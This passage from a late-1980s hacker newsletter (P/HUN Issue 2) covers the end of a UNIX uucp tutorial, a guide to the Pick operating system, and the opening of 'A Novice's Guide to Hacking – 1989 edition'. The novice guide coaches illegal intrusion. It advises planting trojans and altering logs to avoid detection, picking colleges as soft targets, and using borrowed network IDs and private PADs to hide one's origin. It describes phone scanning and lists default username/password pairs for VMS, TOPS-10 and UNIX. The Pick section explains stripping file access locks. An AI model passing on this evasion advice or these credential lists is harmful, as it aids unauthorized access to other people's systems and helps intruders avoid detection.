            to be sent,path name of the destination (TM Transfers),Remote login

            name to be notified after the file transmision is complete,Users

            login name and the name of the programs used eg.uucp,uupick etc.



D - The data files.Format used is  D.systmxxxxyyy.These files are created when

    specified in a command to copy to the spool directory.Eg. By the usage of

    uucp -C this will be true.

    The systm is the remote name,xxxx is the the 4 digits seq assingned by

    the uucp.The yyy is a sub sequence number.



Logining on to remote and sending+receiving files

-------------------------------------------------

 cu - This command allows one to log on to the local as well as the remote

      Unix (or a non unix)without haveing to hang up so you can transfer files.

      Usage:[options]



  $ cu [-s baud rate][-o odd parity][-e even parity][-l name of comm line]

       telephone number | systemname



  To view system names that you can communicate with use the 'unname' command:

  Eg. of output of names:



  ATT01

  ATT02

  ATT03

  ATT04





$ cu -s300 3=9872344 (9872344 is the tel#)

 connected

 login:

 password:



local strings:

--------------

<D.> - will log you off the remote terminal but not the local

D! - out you on the local withiout disconnecting the line from remote

<control-d> - puts you back on the remote unix

D%take [file name] - takes a copy of the file name and copies it to the

                     local(the directory which you are in)

"%put [file name] - reverse of above

D$[command] - allows the execution of a command to the local from remote



ct

--

ct allows local to connect to remote.Initiates a getty on a remote terminal.

Usefull when using a remote terminal.BNU has call back feature that allows

the user on the remote who can execute a call back meaning the local can call

the remote.[   ] are options



$ ct [-h prevent automatic hang up][-s bps rate][-wt set a time to call back

     abbrieviated t mins] telephone number



uux

---

To execute commands on a remote (unix to unix)

usage:[  ] are options



$ uux [- use standard output][-n prevent mail notification][-p also use

      standard output] command-string



uucp

----

uucp copies files from ones computer to the home directory

of a user in remote system.This also works when copying files from one

directory to another in the remote.The remote user will be notified by mail.

This command becomes use full when copying files from a remote to your local

system.

The uucp requires the uucico daemon will call up the remote and will perform

file login sequence,file transfer and notify the user by mail.

Daemons are programs runining in the background.The 3 daemons in a Unix are

uucico,uusched,uuxqt.



 Daemons Explained:[nows a good time to explain the 3 daemons]

 ------------------



 uuxqt - Remote execution.This daemon is executed by uudemon.hour started by

         cron.UUXQT searchs in the spool directory for executable file

         named X.file sent from the remote system.When it finds a file X.file

         where it obtains process which are to be executed.The next step is

         to find weather the processes are available at the time.The if

         available it checks permission and if everthing is o.k it proceeds

         the background proccess.



 uucico - This Daemon is very immportant for it is responsible in establishing

          a connection to the remote also checks permission,performs login

          procedures,transfers + executes files and also notifies the user

          by mail.This daemon is called upon by uucp,uuto,uux commands.



 uusched - This is executed by the shell script called uudemon.hour

           This daemons acts as a randomizer before the UUCICO daemon is

           called.





Usage of uucp command:



$ uucp [options] [first full path name!] file [destination path!] file

example:

$ uucp -m -s bbss hackers unix2!/usr/todd/hackers



What this would do is send the file hackers from your computer to the remotes

/usr/todd/hackers making hackers offcourse as file.todd would mail that

a file has been sent to him.The unix2 is the name of the remote.

Options for uucp:(Dont forget to type in remotes name unix2 in case)

-c  dont copy files to spool directory

-C  copy to spool

-s[file name] - this file will contain the file status(above is bbss)

-r  Dont start the comm program(uucico) yet

-j  print job number(for above eg.unix2e9o3)

-m  send mail when file file is complete



Now suppose you wanted to receive file called kenya which is in the usr/dan/usa

 to your home directory /usr/john assuming that the local systems name is

ATT01 and you are currently working in /usr/dan/usa,you would type in:



$uucp kenya ATT01!/usr/john/kenya



uuto

----

The uuto command allows one to send file to remote user and can also be used

to send files locally.

Usage:

$ uuto [file name] [system!login name]( omit systen name if local)







Conclusion:

-----------

Theres always more one can say about the UNIX but its time to stop.

I hope you have enjoyed the article.I apologize for the lenght. I hope I

made the UNIX operating system more familiar.

Remember do not abuse any systems you hack into for a true hacker doesn't like

to reck but to learn.

I can be reached at (718)358/9209 - Hackers Den88 [2600 BBS #5]



Watch for my new article on using PANAMAC airline computers coming soon.





                           Red Knight

                             P/HUN!

                           <<T.S.A.N>>



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=                 Volume 1 , P/HUN Issue #2 , Phile #7 of 9                   =

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



                     Guide to The Pick Operating System

                     ----------------------------------

                              Mr. Slippery



                  Phreakers/Hackers Underground Network (c)



-------------

Introduction:

-------------

This is an unfamiliar operating system to many in spite of its

being wide spread. It was created by Dick Pick (no kidding) a

number of years ago and can now be found on everything from

IBM PC's through mainframes. One reason it is unfamiliar is

that it has been sold under a number of names such as Mentor,

Ultimate and Reality. It resembles a data base management

system and is also sold as a DBMS on top of MSDOS as Revelation,

as well as running as an application on UNIX and VM/CMS. Its also

unfamiliar to many since its basically sold to do business

functions like accounting in small to medium size businesses and

is therefore less likely to be found by people such as those

reading this article :-)



This is a bare-bones introduction to the system. It does not

include details on the languages nor specific system manager

functions such as how to stop and restart the system. Also, there

is a new version out, open access, that I don't know anything

about. Its supposed to allow for easier integration of Pick with

other operating systems, such as UNIX.



--------------------

Structure of System:

--------------------

Everything outside of the basic operating system (ABS for

absolute addresses) is based on items in files. Even files are

items in other files. The system is laid out in a four level

hierarchy:





                          ----------

                          - SYSTEM -     (user accounts)

                          ----------

                          /    |    X

                         /     |     X

            ------------- --------   ---------

            -     Master- -M/DICT-   -  MD   -  (synonyms for user)

            - Dictionary- -      -   -       -  (account level    )

            ------------- --------   ---------

                  /       /  |   X      X

                 /       /   |    X      X

            ----------  ------------ ---------

            -  DICT  -  -   File   - -       -

            -        -  -Dictionary- -       -

            ----------  ------------ ---------

                 /        /  |   X       X

                /        /   |    X       X

             --------     --------     -------

             - DATA -     - File -     -     -

             -      -     - Data -     -     -

             --------     --------     -------



The System Dictionary (SYSTEM) is a file that contains the user

accounts and passwords. It points to the user's master dictionary

which contains pointers to the dictionary parts of the user's

files and also has commands (VERBS), dictionary defining items

and procedures (PROCS). The data files are divided into two

pieces the dictionary which points to the data portion and

contains items that can be used to retrieve items from the data

portion of the file.



The structure is more complicated as some of these files can

point to themselves and you can therefore have 'one level' data

files.



Each file has ITEMS in it. These items are always in ASCII format

even the numbers so all DICTIONARIES and DATA files can be

displayed and edited. Each ITEM is composed of ATTRIBUTES (what

is typically called fields). The key is called the "ITEM-ID".

Attributes can have multiple values which may also have multiple

subvalues. A danger in the ability to edit everything is that you

can edit the file pointers and make them point at garbage.



This will cause what is known as a "group format error" which is

a phrase meaning that the operating system says your files are

garbaged.



Certain files have predefined DICTIONARY items. For example the

M/DICT first ATTRIBUTE is the D/CODE which tells what kind of

item is in the M/DICT. An "A" is an ATTRIBUTE defining item, "D"

is a file defining item, "P" is a verb, "PQ" is a PROC, "Q" is a

file synonym item and so forth.



-------------------

Command Processors:

-------------------

The languages you find are an extended BASIC, a retrieval

language called ACCESS, ENGLISH and other names depending on

which version of PICK you have and an interpreted procedure

language called PROC. The command interpreter is called TCL for

Terminal Control Language.



-------------------------------

How to recognize a PICK system:

-------------------------------

The prompt you get is typically "LOGON PLEASE: ". There will

always be a "SYSPROG" (system programmer) account and this one

has the highest privileges. If you have your user-id wrong, it

will say "USER_ID?" followed by the LOGON PLEASE prompt. If you

have a bad password, it will prompt "PASSWORD?" followed by the

logon prompt.



---------------------------------

How to see what is on the system:

---------------------------------

Once you are on, you can see what accounts there are by saying

"LIST ONLY DICT SYSTEM". Besides SYSPROG, you will see POINTER-

FILE (items pointing to binary data strings), SYSPROG-PL (system

maintenance PROCS, NEWAC (new account template), ACC (accounting

history file), ERRMSG (system error messages), PROCLIB (PROC

library) and BLOCK-CONVERT (format of characters printed by use

of the BLOCK-PRINT command)



To see the files you can type "LIST ONLY MD WITH D/CODE "D]" or

LISTFILES (which is a PROC). LISTVERBS and LISTPROCS will tell

you what commands are available.



------------------------

Common Commands (VERBS):

------------------------

AS           - Assembler

BLOCK-PRINT  - Print letters as blocks

CHARACTERS   - Print ASCII character set

CHARGES      - Total time logged on and CPU activity stats

COPY         - Copies an item

CREATE-FILE  - Creates a new dictionary & data file

CT file item - Copy an item to terminal

DTR radix #  - Convert Decimal to Radix (default 16)

DUMP frameid - Binary dump of virtual disk frames

ECHO ON/OFF  - Terminal echoing ON or OFF

LISTFILES    - List of files

LISTPROCS    - List of PROCs

LISTU        - PROC showing who is on the computer

LISTVERBS    - List all VERBS

LOGTO name   - Change to another user

LOGOFF       - Logout

MSG          - Sends a message to another user.

POVF         - Print OVerFlow tells how much disc is free

PRINT-ERR    - Output specified error message number (ERRMSG)

RECOVER-FD   - Recover editor deleted (FD) item.

RUNOFF       - Output processor (like VMS runoff and UNIX nroff)

SAVE         - Backup system to tape or floppy

SET-FILE     - Create a synonym file called QFILE in your MD

SETUP-ASSY   - Setup account for assembler (run from SYSPROG)

SLEEP        - Take a nap for n seconds or until given time

SP-STATUS    - Printer spooler status

T-ATT        - Attach the tape drive

T-READ       - Read from the tape drive

T-DET        - Detach the tape drive

TABS         - Display tab stops

TERM         - Specifies terminal characteristics

TIME         - Shows current date & time

TA-ON/OFF    - Typeahead ON or OFF

WHAT         - Displays system configuration

WHERE        - Current information on processes

WHO          - Display your account name (WHO * is for all)



--------------

File creation:

--------------

CREATE-FILE filename dictmod,dictsep datamod,datasep

modulo or mod is the number of contiguous disk groups allocated

for a given file and separation is the size of a group. Typically

the separation is set to 1. Deleting a file: "DELETE-FILE filename"



----------------

Copying an item:

----------------

"COPY FILE ITEM <CR>"

The machine will print: TO:

Enter: (optional file) item. Here if you want to copy an item to

another name in the same file leave off the filename else put in

the file name you want. To delete an item type: "DELETE file item".



----------------------

Access/Recall/English:

----------------------

To look at an item you can either use the editor or the retrieval

processor. The two basic commands are LIST and SORT. SORT sorts

the file and then does a LIST. To see what dictionary items (such

as "SALARY" exist for a file, type "LISTDICTS filename".



The structure of the retrieval command is:



COMMAND FILE-NAME SELECTION-CRITERIA SORT-CRITERIA OUTPUT-CRITERIA



An example is "LIST PAYROLL WITH SALARY > "10000"

Another is    "SORT M/DICT BY D/CODE"



-------

Editor:

-------

Pick has a fairly simple text editor. You call it up by typing

"ED Filename Itemname". Commands include DEn (delete n lines),

EX (exit, don't save), FI (file item), Ln (list n lines), Gn

(go to line number 'n'), R/a/b (replace 'a' with 'b') and X

(cancel last command). 'I' puts you in insert mode; a <cr> as the

first character in the line terminates insert mode.



------

BASIC:

------

Mostly you program the system in a very extended version of

BASIC. After editing in your program, you have to compile it by

typing "BASIC file item". Actually its not a compilation into

machine code. It compiles into a meta-code like some versions of

PASCAL compile into P-code. To execute the program, type "RUN

file item". Some programs are "cataloged" which means that an item

is stored in a special format and a pointer with the name of the

program written in the master dictionary so all you have to do is

type the name of the program instead of "RUN file item".



Some of the commands are familiar like "GOTO", "GOSUB" and "FOR"

while many are unique to Pick like those dealing with opening,

reading and writing to files. Pick Basic has a number of neat

things in it like conversion between ascii and ebcdic which is

useful for dealing with stuff from an IBM mainframe.



-----

PROC:

-----

Proc is the stored procedure langage. The first line of all of

them begin with "PQ". Some versions have a different language so

you might also see "PQN". PROCs have subroutine calls shown by

parenthese () or brackets []. Some commands: C - comment, G - go

to a linenumber, IF - Test, IP - input from terminal, O - output

text to terminal, P - process commands in output buffer, RI -

reset input buffers to null, T - terminal output with special

functions like screen clear and X - exit PROC. The processor has

two input buffers and two output buffers and if you want to know

more you should consult a PROC manual or book.



----

TCL:

----

Many commands take options of (N) for do not stop between pages

and (P) for send data to the line printer. For example: "COPY foo

bar (n,t)" means copy item 'bar' from file 'foo' to the terminal and

do not stop between pages.



There are a number of useful terminal control characters:

Control-H - Backspace a character

  "    -I - Tab

  "    -Q - XON (restart output - after XOFF)

  "    -R - Retype last line

  "    -S - XOFF (stop output)

  "    -W - Backspace a word

  "    -X - Cancel current input line



--------------

Communication:

--------------

Pick is not a good communicator. The vast majority of systems are

stand-alone running a canned application. Some of the vendors

have added some file transfer and networking functions, but

typically this is done by another OS when Pick is a guest (such

as VM and UNIX).



-----------

Privileges:

-----------

The Pick system has 3 privilege levels. The lowest does not allow

the user to update the master dictionary or use the tape drive.

The second does not allow the use of interesting parts of the

debugger and certain system maintenance commands. The highest

allows full privileges.



---------

Security:

---------

The system has very little security. Any intermediate hacker can

break thru it very easily. You don't have to be elite. Its based

on codes put in attributes 5 and 6 of file defining items. The

retrieval lock is put in attribute 5 and the update lock in

attribute 6. When you logon, the values in attributes 5 and 6 of

your account are stored and compared against any file you want to

access. A match and your in otherwise you'll get a message that

says the file is access protected.



You put security on a file by editing the file defining items

which means that if you can edit the 'D'-pointer, you can add and

remove the security on the items in the file.



By the way, if you think the security section is skimpy its

because there's not much of it. In earlier versions of the system

the passwords were not even encrypted and anyone could get at

them if they had a little knowledge and access to the editor!



------------------------------

System Messages (ERRMSG) file:

------------------------------

The messages the system prints out are stored in a file, ERRMSG.

So if you are tired of a message like "THE WORD 'item' is

ILLEGAL", all you have to do is "ED ERRMSG 5" and say whatever

you like.



-----------------

That's all Folks:

-----------------

There are a few books on the operating system. A WELL equipped

bookstore will have some. One source (at least according to the

documentation I have is JES & Associates, PO Box 19274, Irvine,

CA 92714; phone (714) 786-2211.





=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                 Volume 1 , P/HUN Issue #2 , Phile #8 of 9

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





               +++++++++++++++++++++++++++++++++++++++++++++++++

               |              The LOD/H Presents               |

++++++++++++++++                                               ++++++++++++++++

 X                 A Novice's Guide to Hacking- 1989 edition                 /

  X                =========================================                /

   X                                  by                                   /

    X                             The Mentor                              /

     X                  Legion of Doom/Legion of Hackers                 /

      X                                                                 /

       X                        December, 1988                         /

        X                  Merry Christmas Everyone!                  /

         X+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/



    **********************************************************************

    |  The author hereby grants permission to reproduce, redistribute,   |

    |  or include this file in your g-file section, electronic or print  |

    |  newletter, or any other form of transmission that you choose, as  |

    |  long as it is kept intact and whole, with no ommissions, delet-   |

    |  ions, or changes.  (C) The Mentor- Phoenix Project Productions    |

    |                                     1988,1989  512/441-3088        |

    **********************************************************************



Introduction: The State of the Hack

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

   After surveying a rather large g-file collection, my attention was drawn to

the fact that there hasn't been a good introductory file written for absolute

beginners since back when Mark Tabas was cranking them out (and almost

*everyone* was a beginner!)  The Arts of Hacking and Phreaking have changed

radically since that time, and as the 90's approach, the hack/phreak community

has recovered from the Summer '87 busts (just like it recovered from the Fall

'85 busts, and like it will always recover from attempts to shut it down), and

the progressive media (from Reality Hackers magazine to William Gibson and

Bruce Sterling's cyberpunk fables of hackerdom) is starting to take notice

of us for the first time in recent years in a positive light.

   Unfortunately, it has also gotten more dangerous since the early 80's.

Phone cops have more resources, more awareness, and more intelligence that they

exhibited in the past.  It is becoming more and more difficult to survive as

a hacker long enough to become skilled in the art.  To this end this file

is dedicated .  If it can help someone get started, and help them survive

to discover new systems and new information, it will have served it's purpose,

and served as a partial repayment to all the people who helped me out when I

was a beginner.



Contents

DDDDDDDD

   This file will be divided into four parts:

       Part 1: What is Hacking, A Hacker's Code of Ethics, Basic Hacking Safety

       Part 2: Packet Switching Networks: Telenet- How it Works, How to Use it,

               Outdials, Network Servers, Private PADs

       Part 3: Identifying a Computer, How to Hack In, Operating System

               Defaults

       Part 4: Conclusion- Final Thoughts, Books to Read, Boards to Call,

               Acknowledgements



Part One: The Basics

DDDDDDDDDDDDDDDDDDDD

    As long as there have been computers, there have been hackers.  In the 50's

at the Massachusets Institute of Technology (MIT), students devoted much time

and energy to ingenious exploration of the computers.  Rules and the law were

disregarded in their pursuit for the 'hack'.  Just as they were enthralled with

their pursuit of information, so are we.  The thrill of the hack is not in

breaking the law, it's in the pursuit and capture of knowledge.

    To this end, let me contribute my suggestions for guidelines to follow to

ensure that not only you stay out of trouble, but you pursue your craft without

damaging the computers you hack into or the companies who own them.



I.    Do not intentionally damage *any* system.

II.   Do not alter any system files other than ones needed to ensure your

      escape from detection and your future access (Trojan Horses, Altering

      Logs, and the like are all necessary to your survival for as long as

      possible.)

III.  Do not leave your (or anyone else's) real name, real handle, or real

      phone number on any system that you access illegally.  They *can* and

      will track you down from your handle!

IV.   Be careful who you share information with.  Feds are getting trickier.

      Generally, if you don't know their voice phone number, name, and

      occupation or haven't spoken with them voice on non-info trading

      conversations, be wary.

V.    Do not leave your real phone number to anyone you don't know.  This

      includes logging on boards, no matter how k-rad they seem.  If you

      don't know the sysop, leave a note telling some trustworthy people

      that will validate you.

VI.   Do not hack government computers.  Yes, there are government systems

      that are safe to hack, but they are few and far between.  And the

      government has inifitely more time and resources to track you down than

      a company who has to make a profit and justify expenses.

VII.  Don't use codes unless there is *NO* way around it (you don't have a

      local telenet or tymnet outdial and can't connect to anything 800...)

      You use codes long enough, you will get caught.  Period.

VIII. Don't be afraid to be paranoid.  Remember, you *are* breaking the law.

      It doesn't hurt to store everything encrypted on your hard disk, or

      keep your notes buried in the backyard or in the trunk of your car.

      You may feel a little funny, but you'll feel a lot funnier when you

      when you meet Bruno, your transvestite cellmate who axed his family to

      death.

IX.   Watch what you post on boards.  Most of the really great hackers in the

      country post *nothing* about the system they're currently working

      except in the broadest sense (I'm working on a UNIX, or a COSMOS, or

      something generic.  Not "I'm hacking into General Electric's Voice Mail

      System" or something inane and revealing like that.)

X.    Don't be afraid to ask questions.  That's what more experienced hackers

      are for.  Don't expect *everything* you ask to be answered, though.

      There are some things (LMOS, for instance) that a begining hacker

      shouldn't mess with.  You'll either get caught, or screw it up for

      others, or both.

XI.   Finally, you have to actually hack.  You can hang out on boards all you

      want, and you can read all the text files in the world, but until you

      actually start doing it, you'll never know what it's all about.  There's

      no thrill quite the same as getting into your first system (well, ok,

      I can think of a couple of bigger thrills, but you get the picture.)



   One of the safest places to start your hacking career is on a computer

system belonging to a college.  University computers have notoriously lax

security, and are more used to hackers, as every college computer depart-

ment has one or two, so are less likely to press charges if you should

be detected.  But the odds of them detecting you and having the personel to

committ to tracking you down are slim as long as you aren't destructive.

   If you are already a college student, this is ideal, as you can legally

explore your computer system to your heart's desire, then go out and look

for similar systems that you can penetrate with confidence, as you're already

familar with them.

   So if you just want to get your feet wet, call your local college.  Many of

them will provide accounts for local residents at a nominal (under $20) charge.

   Finally, if you get caught, stay quiet until you get a lawyer.  Don't vol-

unteer any information, no matter what kind of 'deals' they offer you.

Nothing is binding unless you make the deal through your lawyer, so you might

as well shut up and wait.



Part Two: Networks

DDDDDDDDDDDDDDDDDD

   The best place to begin hacking (other than a college) is on one of the

bigger networks such as Telenet.  Why?  First, there is a wide variety of

computers to choose from, from small Micro-Vaxen to huge Crays.  Second, the

networks are fairly well documented.  It's easier to find someone who can help

you with a problem off of Telenet than it is to find assistance concerning your

local college computer or high school machine.  Third, the networks are safer.

Because of the enormous number of calls that are fielded every day by the big

networks, it is not financially practical to keep track of where every call and

connection are made from.  It is also very easy to disguise your location using

the network, which makes your hobby much more secure.

   Telenet has more computers hooked to it than any other system in the world

once you consider that from Telenet you have access to Tymnet, ItaPAC, JANET,

DATAPAC, SBDN, PandaNet, THEnet, and a whole host of other networks, all of

which you can connect to from your terminal.

   The first step that you need to take is to identify your local dialup port.

This is done by dialing 1-800-424-9494 (1200 7E1) and connecting.  It will

spout some garbage at you and then you'll get a prompt saying 'TERMINAL='.

This is your terminal type.  If you have vt100 emulation, type it in now.  Or

just hit return and it will default to dumb terminal mode.

   You'll now get a prompt that looks like a @.  From here, type @c mail <cr>

and then it will ask for a Username.  Enter 'phones' for the username. When it

asks for a password, enter 'phones' again.  From this point, it is menu

driven.  Use this to locate your local dialup, and call it back locally.  If

you don't have a local dialup, then use whatever means you wish to connect to

one long distance (more on this later.)

   When you call your local dialup, you will once again go through the

TERMINAL= stuff, and once again you'll be presented with a @.  This prompt lets

you know you are connected to a Telenet PAD.  PAD stands for either Packet

Assembler/Disassembler (if you talk to an engineer), or Public Access Device

(if you talk to Telenet's marketing people.)  The first description is more

correct.

   Telenet works by taking the data you enter in on the PAD you dialed into,

bundling it into a 128 byte chunk (normally... this can be changed), and then

transmitting it at speeds ranging from 9600 to 19,200 baud to another PAD, who

then takes the data and hands it down to whatever computer or system it's

connected to.  Basically, the PAD allows two computers that have different baud

rates or communication protocols to communicate with each other over a long

distance.  Sometimes you'll notice a time lag in the remote machines response.

This is called PAD Delay, and is to be expected when you're sending data

through several different links.

   What do you do with this PAD?  You use it to connect to remote computer

systems by typing 'C' for connect and then the Network User Address (NUA) of

the system you want to go to.

   An NUA takes the form of   031103130002520

                              X___/X___/X___/

                                |    |    |

                                |    |    |____ network address

                                |    |_________ area prefix

                                |______________ DNIC





     This is a summary of DNIC's (taken from Blade Runner's file on ItaPAC)

     according to their country and network name.





DNIC   Network Name    Country          DNIC   Network Name    Country

_______________________________________________________________________________

                                     |

02041   Datanet 1       Netherlands  |  03110   Telenet         USA

02062   DCS             Belgium      |  03340   Telepac         Mexico

02080   Transpac        France       |  03400   UDTS-Curacau    Curacau

02284   Telepac         Switzerland  |  04251   Isranet         Israel

02322   Datex-P         Austria      |  04401   DDX-P           Japan

02329   Radaus          Austria      |  04408   Venus-P         Japan

02342   PSS             UK           |  04501   Dacom-Net       South Korea

02382   Datapak         Denmark      |  04542   Intelpak        Singapore

02402   Datapak         Sweden       |  05052   Austpac         Australia

02405   Telepak         Sweden       |  05053   Midas           Australia

02442   Finpak          Finland      |  05252   Telepac         Hong Kong

02624   Datex-P         West Germany |  05301   Pacnet          New Zealand

02704   Luxpac          Luxembourg   |  06550   Saponet         South Africa

02724   Eirpak          Ireland      |  07240   Interdata       Brazil

03020   Datapac         Canada       |  07241   Renpac          Brazil

03028   Infogram        Canada       |  09000   Dialnet         USA

03103   ITT/UDTS        USA          |  07421   Dompac          French Guiana

03106   Tymnet          USA          |



   There are two ways to find interesting addresses to connect to.  The first

and easiest way is to obtain a copy of the LOD/H Telenet Directory from the

LOD/H Technical Journal #4 or 2600 Magazine.  Jester Sluggo also put out a good

list of non-US addresses in Phrack Inc. Newsletter Issue 21.  These files will

tell you the NUA, whether it will accept collect calls or not, what type of

computer system it is (if known) and who it belongs to (also if known.)

   The second method of locating interesting addresses is to scan for them

manually.  On Telenet, you do not have to enter the 03110 DNIC to connect to a

Telenet host.  So if you saw that 031104120006140 had a VAX on it you wanted to

look at, you could type @c 412 614 (0's can be ignored most of the time.)

   If this node allows collect billed connections, it will say 412 614

CONNECTED and then you'll possibly get an identifying header or just a

Username: prompt.  If it doesn't allow collect connections, it will give you a

message such as 412 614 REFUSED COLLECT CONNECTION with some error codes out to

the right, and return you to the @ prompt.

   There are two primary ways to get around the REFUSED COLLECT message.  The

first is to use a Network User Id (NUI) to connect.  An NUI is a username/pw

combination that acts like a charge account on Telenet.  To collect to node

412 614 with NUI junk4248, password 525332, I'd type the following:

@c 412 614,junk4248,525332  <---- the 525332 will *not* be echoed to the

screen.  The problem with NUI's is that they're hard to come by unless you're

a good social engineer with a thorough knowledge of Telenet (in which case

you probably aren't reading this section), or you have someone who can

provide you with them.

   The second way to connect is to use a private PAD, either through an X.25

PAD or through something like Netlink off of a Prime computer (more on these

two below.)

   The prefix in a Telenet NUA oftentimes (not always) refers to the phone Area

Code that the computer is located in (i.e. 713 xxx would be a computer in

Houston, Texas.)  If there's a particular area you're interested in, (say,

New York City 914), you could begin by typing @c 914 001 <cr>.  If it connects,

you make a note of it and go on to 914 002.  You do this until you've found

some interesting systems to play with.

   Not all systems are on a simple xxx yyy address.  Some go out to four or

five digits (914 2354), and some have decimal or numeric extensions

(422 121A = 422 121.01).  You have to play with them, and you never know what

you're going to find.  To fully scan out a prefix would take ten million

attempts per prefix.  For example, if I want to scan 512 completely, I'd have

to start with 512 00000.00 and go through 512 00000.99, then increment the

address by 1 and try 512 00001.00 through 512 00001.99.  A lot of scanning.

There are plenty of neat computers to play with in a 3-digit scan, however,

so don't go berserk with the extensions.

   Sometimes you'll attempt to connect and it will just be sitting there after

one or two minutes.  In this case, you want to abort the connect attempt by

sending a hard break (this varies with different term programs, on Procomm,

it's ALT-B), and then when you get the @ prompt back, type 'D' for disconnect.

   If you connect to a computer and wish to disconnect, you can type <cr> @

<cr> and you it should say TELENET and then give you the @ prompt.  From there,

type D to disconnect or CONT to re-connect and continue your session

uninterrupted.



Outdials, Network Servers, and PADs

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

   In addition to computers, an NUA may connect you to several other things.

One of the most useful is the outdial.  An outdial is nothing more than a modem

you can get to over telenet- similar to the PC Pursuit concept, except that

these don't have passwords on them most of the time.

   When you connect, you will get a message like 'Hayes 1200 baud outdial,

Detroit, MI', or 'VEN-TEL 212 Modem', or possibly 'Session 1234 established

on Modem 5588'.  The best way to figure out the commands on these is to

type ? or H or HELP- this will get you all the information that you need to

use one.

   Safety tip here- when you are hacking *any* system through a phone dialup,

always use an outdial or a diverter, especially if it is a local phone number

to you.  More people get popped hacking on local computers than you can

imagine, Intra-LATA calls are the easiest things in the world to trace inexp-

ensively.

   Another nice trick you can do with an outdial is use the redial or macro

function that many of them have.  First thing you do when you connect is to

invoke the 'Redial Last Number' facility.  This will dial the last number used,

which will be the one the person using it before you typed.  Write down the

number, as no one would be calling a number without a computer on it.  This

is a good way to find new systems to hack.  Also, on a VENTEL modem, type 'D'

for Display and it will display the five numbers stored as macros in the

modem's memory.

   There are also different types of servers for remote Local Area Networks

(LAN) that have many machine all over the office or the nation connected to

them.  I'll discuss identifying these later in the computer ID section.

   And finally, you may connect to something that says 'X.25 Communication

PAD' and then some more stuff, followed by a new @ prompt.  This is a PAD

just like the one you are on, except that all attempted connections are billed

to the PAD, allowing you to connect to those nodes who earlier refused collect

connections.

   This also has the added bonus of confusing where you are connecting from.

When a packet is transmitted from PAD to PAD, it contains a header that has

the location you're calling from.  For instance, when you first connected

to Telenet, it might have said 212 44A CONNECTED if you called from the 212

area code.  This means you were calling PAD number 44A in the 212 area.

That 21244A will be sent out in the header of all packets leaving the PAD.

   Once you connect to a private PAD, however, all the packets going out

from *it* will have it's address on them, not yours.  This can be a valuable

buffer between yourself and detection.



Phone Scanning

DDDDDDDDDDDDDD

   Finally, there's the time-honored method of computer hunting that was made

famous among the non-hacker crowd by that Oh-So-Technically-Accurate movie

Wargames.  You pick a three digit phone prefix in your area and dial every

number from 0000 --> 9999 in that prefix, making a note of all the carriers

you find.  There is software available to do this for nearly every computer

in the world, so you don't have to do it by hand.



Part Three: I've Found a Computer, Now What?

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

   This next section is applicable universally.  It doesn't matter how you

found this computer, it could be through a network, or it could be from

carrier scanning your High School's phone prefix, you've got this prompt

this prompt, what the hell is it?

   I'm *NOT* going to attempt to tell you what to do once you're inside of

any of these operating systems.  Each one is worth several G-files in its

own right.  I'm going to tell you how to identify and recognize certain

OpSystems, how to approach hacking into them, and how to deal with something

that you've never seen before and have know idea what it is.





VMS-       The VAX computer is made by Digital Equipment Corporation (DEC),

           and runs the VMS (Virtual Memory System) operating system.

           VMS is characterized by the 'Username:' prompt.  It will not tell

           you if you've entered a valid username or not, and will disconnect

           you after three bad login attempts.  It also keeps track of all

           failed login attempts and informs the owner of the account next time

           s/he logs in how many bad login attempts were made on the account.

           It is one of the most secure operating systems around from the

           outside, but once you're in there are many things that you can do

           to circumvent system security.  The VAX also has the best set of

           help files in the world.  Just type HELP and read to your heart's

           content.

           Common Accounts/Defaults:  [username: password [[,password]] ]

           SYSTEM:     OPERATOR or MANAGER or SYSTEM or SYSLIB

           OPERATOR:   OPERATOR

           SYSTEST:    UETP

           SYSMAINT:   SYSMAINT or SERVICE or DIGITAL

           FIELD:      FIELD or SERVICE

           GUEST:      GUEST or unpassworded

           DEMO:       DEMO  or unpassworded

           DECNET:     DECNET





DEC-10-    An earlier line of DEC computer equipment, running the TOPS-10

           operating system.  These machines are recognized by their

           '.' prompt.  The DEC-10/20 series are remarkably hacker-friendly,

           allowing you to enter several important commands without ever

           logging into the system.  Accounts are in the format [xxx,yyy] where

           xxx and yyy are integers.  You can get a listing of the accounts and

           the process names of everyone on the system before logging in with

           the command .systat (for SYstem STATus).  If you seen an account

           that reads [234,1001]   BOB JONES, it might be wise to try BOB or

           JONES or both for a password on this account.  To login, you type

           .login xxx,yyy  and then type the password when prompted for it.

           The system will allow you unlimited tries at an account, and does

           not keep records of bad login attempts.  It will also inform you

           if the UIC you're trying (UIC = User Identification Code, 1,2 for

           example) is bad.

           Common Accounts/Defaults:

           1,2:        SYSLIB or OPERATOR or MANAGER

           2,7:        MAINTAIN

           5,30:       GAMES



UNIX-      There are dozens of different machines out there that run UNIX.

           While some might argue it isn't the best operating system in the

           world, it is certainly the most widely used.  A UNIX system will

           usually have a prompt like 'login:' in lower case.  UNIX also

           will give you unlimited shots at logging in (in most cases), and

           there is usually no log kept of bad attempts.

           Common Accounts/Defaults: (note that some systems are case

           sensitive, so use lower case as a general rule.  Also, many times

           the accounts will be unpassworded, you'll just drop right in!)

           root:       root

           admin:      admin

           sysadmin:   sysadmin or admin

           unix:       unix

           uucp:       uucp

           rje:        rje

           guest:      guest

           demo:       demo

           daemon:     daemon

           sysbin:     sysbin



Prime-     Prime computer company's mainframe running the Primos operating

           system.  The are easy to spot, as the greet you with

           'Primecon 18.23.05' or the like, depending on the version of the

           operating system you run into.  There will usually be no prompt

           offered, it will just look like it's sitting there.  At this point,

           type 'login <username>'.  If it is a pre-18.00.00 version of Primos,

           you can hit a bunch of ^C's for the password and you'll drop in.

           Unfortunately, most people are running versions 19+.  Primos also

           comes with a good set of help files.  One of the most useful

